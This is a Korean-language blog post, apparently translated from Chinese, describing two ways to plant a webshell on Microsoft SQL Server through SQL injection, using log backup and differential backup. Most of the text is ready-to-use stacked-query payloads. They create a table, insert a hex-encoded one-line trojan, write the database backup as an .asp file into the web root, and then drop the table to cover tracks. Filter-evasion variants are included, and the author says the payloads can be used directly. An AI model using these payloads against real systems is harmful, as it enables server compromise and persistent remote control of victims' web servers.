sqlserver 의 두 가지 백업 getshell (건어물)
이번 에는 sqlserver 를 통 해 getshell 을 진행 하 는 두 가지 방법 을 요약 하 겠 습 니 다. payload 는 직접 가 져 와 서 사용 할 수 있 습 니 다. 더 이상 말 하지 않 고 아래 를 내 려 다 보면 끝 납 니 다.
우세:
1. 중복 성 이 좋 고 여러 번 백업 하 는 성 공률 이 높다.
2. 차이 백업 에 비해 셸 의 부피 가 작 습 니 다.
이용 조건: 최소 DBO 권한
1. 전 제 는 절대적 인 경 로 를 알 고 쓸 수 있다.
2. 라 이브 러 리 분리 안 함
3. 데이터 베 이 스 는 반드시 한 번 백업 되 어야 합 니 다.
첫 번 째 단계:
;alter database 库名 set RECOVERY FULL--두 번 째 단계:
;create table 数据库名..表名(a image)-- //建表세 번 째 단계:
;insert into 数据库名..表名(a) values (0x一句话木马)-- //插入一句话木马到表中,注意16进制네 번 째 단계:
;backup database 数据库名 to disk = 'c:\www\panda.bak'-- //先手动给test1备份一遍다섯 번 째 단계:
;backup log 数据库名 to disk = 'c:\www\panda.asp' with init-- //利用log备份到web路径getshell여섯 번 째 단계:
;Drop table 数据库名..表名-- //删除表차이 백업 조건: 최소 DBO 권한
1. 전 제 는 절대 경 로 를 알 고 경 로 는 쓸 수 있 습 니 다.
2. HTTP 500 오 류 는 사용자 정의 가 아 닙 니 다.
3. WEB 와 데이터 가 함께 있 습 니 다.그리고 데이터베이스 에% 번호 같은 것 이 존재 해 서 는 안 된다 는 것 이다. 그렇지 않 으 면 성공 하지 못 할 것 이다.
4. 데이터 양 이 많 으 면 안 됩 니 다.
첫 번 째 단계:
;backup database 库名 to disk = 'c:\bak.bak' ;-- //先手动备份一次필터 가 걸 리 면 아래 payload 를 사용 하 십시오:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径\xx.bak backup database @a to disk=@s-- //0x备份的数据库名转换成16位进制,db_name()里面可以加数字备份不同的数据库두 번 째 단계:
;create table 数据库名..表名(a image)-- //建立表,加字段세 번 째 단계:
;insert into 数据库名..表名(a) values (0x一句话木马)-- //插入一句话木马到表中,注意16进制
네 번 째 단계:
;backup database 库名 to disk = 'c:\shell.asp' with differential , format ;-- //进行差异备份필터 가 걸 리 면 아래 payload 를 사용 하 십시오:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径\xx.asp backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- //备份到路径\xx.asp,前提是已得知路径,注意转换为16进制,假如备份的路径为c:\webroot\panda.asp ,访问查看是否备份getshell成功다섯 번 째 단계:
;Drop table 数据库..表名-- //备份完getshell过后删除表글 속 의 방법 과 payload 친 측 으로 사용 할 수 있 으 며, 그림 에 대해 서 는 약간의 자체 뇌 보 를 할 수 있 으 며, 주입 점 에서 조작 하면 된다.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.
좋은 웹페이지 즐겨찾기
